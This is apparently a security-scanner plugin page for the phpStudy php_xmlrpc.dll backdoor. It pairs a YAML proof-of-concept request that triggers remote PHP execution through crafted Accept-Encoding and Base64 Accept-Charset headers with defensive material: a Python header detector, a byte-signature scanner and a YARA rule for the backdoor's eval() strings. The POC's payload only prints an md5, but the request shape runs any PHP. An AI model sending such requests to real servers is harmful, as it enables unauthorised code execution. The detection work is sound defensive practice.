Vulnerability verification plugin


name: poc-yaml-phpstudy-backdoor-rce
rules:
  - method: GET
    path: /index.php
    headers:
      # exactly "gzip,deflate", no space after the comma: this is the backdoor's trigger value
      Accept-Encoding: 'gzip,deflate'
      # Base64 of the PHP payload printf(md5(45731344));
      Accept-Charset: cHJpbnRmKG1kNSg0NTczMTM0NCkpOw==
    follow_redirects: false
    # the backdoor executes the payload, so the digest it prints appears in the body
    expression: |
      body.bcontains(b'a5952fb670b54572bcec7440a554633e')
detail:
  author: 17bdw
  Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4"
  vuln_url: "php_xmlrpc.dll"
  links:
    - https://www.freebuf.com/column/214946.html

Network characteristics

Accept-Encoding: gzip,deflate    one space short: the backdoor matches the exact value "gzip,deflate" with no space after the comma, whereas browsers send "gzip, deflate"
Accept-Charset: the value is the Base64-encoded PHP payload (in the POC above it decodes to printf(md5(45731344));), where a real Accept-Charset is a list of charset names
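The two network characteristics above are enough to write a request-side detector (for a WAF rule, a proxy log review or an IDS check) and to verify the POC's response check. The following is an added example, not code from the original post or from any scanner; the sample requests are constructed here from the POC headers, not captured traffic. It flags a request only when Accept-Encoding is exactly "gzip,deflate" and Accept-Charset Base64-decodes to something shaped like a PHP statement, and it checks a response for the md5 the payload prints.

```python
import base64
import hashlib
import re

# Constructed sample requests (not captured traffic). POC_REQUEST carries the
# headers from the POC on this page; NEAR_MISS_REQUEST shows that the browser
# style value with a space after the comma does not match the trigger.
NORMAL_REQUEST = {
    "Accept-Encoding": "gzip, deflate",
    "Accept-Charset": "utf-8",
}
POC_REQUEST = {
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": "cHJpbnRmKG1kNSg0NTczMTM0NCkpOw==",
}
NEAR_MISS_REQUEST = {
    "Accept-Encoding": "gzip, deflate",
    "Accept-Charset": "cHJpbnRmKG1kNSg0NTczMTM0NCkpOw==",
}

# Loose shape of a PHP statement: a call such as printf(...) or system(...)
# terminated by ';'. Genuine Accept-Charset values are charset tokens and
# never decode to this.
PHP_STATEMENT = re.compile(rb"[A-Za-z_]\w*\s*\(.*\)\s*;", re.S)


def decode_charset_payload(value):
    """Base64-decode an Accept-Charset value; None if it is not valid Base64."""
    try:
        return base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def backdoor_trigger(headers):
    """Return the decoded PHP payload if the request has the backdoor's
    trigger shape, otherwise None.

    Trigger shape: Accept-Encoding is exactly 'gzip,deflate' (no space after
    the comma, which browsers always add) and Accept-Charset Base64-decodes
    to PHP code.
    """
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    if h.get("accept-encoding") != "gzip,deflate":
        return None
    payload = decode_charset_payload(h.get("accept-charset", ""))
    if payload is None or not PHP_STATEMENT.search(payload):
        return None
    return payload.decode("latin-1")


def expected_digest(nonce="45731344"):
    """The POC payload printf(md5(45731344)) makes a backdoored server print
    md5('45731344') (PHP stringifies the integer) into the response."""
    return hashlib.md5(nonce.encode()).hexdigest()


def execution_confirmed(body, nonce="45731344"):
    """True if the response body carries the digest the POC payload prints."""
    return expected_digest(nonce).encode() in body


if __name__ == "__main__":
    for name, req in [("normal", NORMAL_REQUEST), ("poc", POC_REQUEST),
                      ("near miss", NEAR_MISS_REQUEST)]:
        print(f"{name:9s} -> {backdoor_trigger(req)!r}")
```

When hunting in access logs, the request-side check is the useful one: the backdoor responds to any PHP in Accept-Charset, not just the POC's printf, so match on the header shape rather than on the one Base64 string.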

File characteristics

Feature 1:
%s;@eval(%s('%s'));   25 73 3B 40 65 76 61 6C 28 25 73 28 27 25 73 27 29 29 3B
Feature 2:
@eval(%s('%s'));     40 65 76 61 6C 28 25 73 28 27 25 73 27 29 29 3B
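For hosts where YARA is not available, the same two byte signatures can be checked directly. The following is an added example, not code from the original post; the "DLL" inputs are constructed byte strings standing in for a clean and a trojaned php_xmlrpc.dll, not real files. It first confirms that each hex dump above really encodes its ASCII form, then scans for both signatures and reports offsets.

```python
# Signatures as the page prints them: the hex dump and the ASCII it should equal.
SIGNATURES = {
    "feature 1": ("25 73 3B 40 65 76 61 6C 28 25 73 28 27 25 73 27 29 29 3B",
                  b"%s;@eval(%s('%s'));"),
    "feature 2": ("40 65 76 61 6C 28 25 73 28 27 25 73 27 29 29 3B",
                  b"@eval(%s('%s'));"),
}


def hexdump_to_bytes(dump):
    """bytes.fromhex() skips ASCII whitespace, so the dump can be pasted as-is."""
    return bytes.fromhex(dump)


def verify_signatures():
    """Check that each hex dump really encodes its ASCII form (catches a
    transcription error before the signature is rolled out)."""
    return {name: hexdump_to_bytes(dump) == ascii_form
            for name, (dump, ascii_form) in SIGNATURES.items()}


def scan_bytes(data):
    """Return (feature name, offset) for every occurrence of either signature,
    sorted by offset. Feature 2 is a suffix of feature 1, so a feature 1 hit
    at offset n always comes with a feature 2 hit at n + 3."""
    hits = []
    for name, (dump, _) in SIGNATURES.items():
        sig = hexdump_to_bytes(dump)
        pos = data.find(sig)
        while pos != -1:
            hits.append((name, pos))
            pos = data.find(sig, pos + 1)
    return sorted(hits, key=lambda hit: hit[1])


def scan_file(path):
    """Scan one file (e.g. php_xmlrpc.dll) in full; the DLL is small enough."""
    with open(path, "rb") as f:
        return scan_bytes(f.read())


# Constructed stand-ins for a clean and a trojaned DLL (not real files): a fake
# PE header, an exported symbol name and, in the trojaned copy, the format
# string the backdoor uses to build its eval() wrapper.
CLEAN_DLL = b"MZ" + b"\x00" * 64 + b"xmlrpc_server_create" + b"\x00" * 32
TROJANED_DLL = CLEAN_DLL + b"\x00" * 8 + b"%s;@eval(%s('%s'));" + b"\x00" * 8

if __name__ == "__main__":
    print(verify_signatures())
    print(scan_bytes(CLEAN_DLL))
    print(scan_bytes(TROJANED_DLL))
```

A hit on feature 2 alone is still a hit: the shorter string is the part that survives if only the leading "%s;" differs between builds.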


rule PhpStudybackdoor
{
    meta:
        filetype = "PhpStudybackdoor"
        description = "PhpStudybackdoor check"
    strings:
        // format strings the trojaned php_xmlrpc.dll uses to wrap the payload in eval()
        $a1 = "@eval(%s('%s'));"
        $a2 = "%s;@eval(%s('%s'));"
    condition:
        any of ($a*)
}
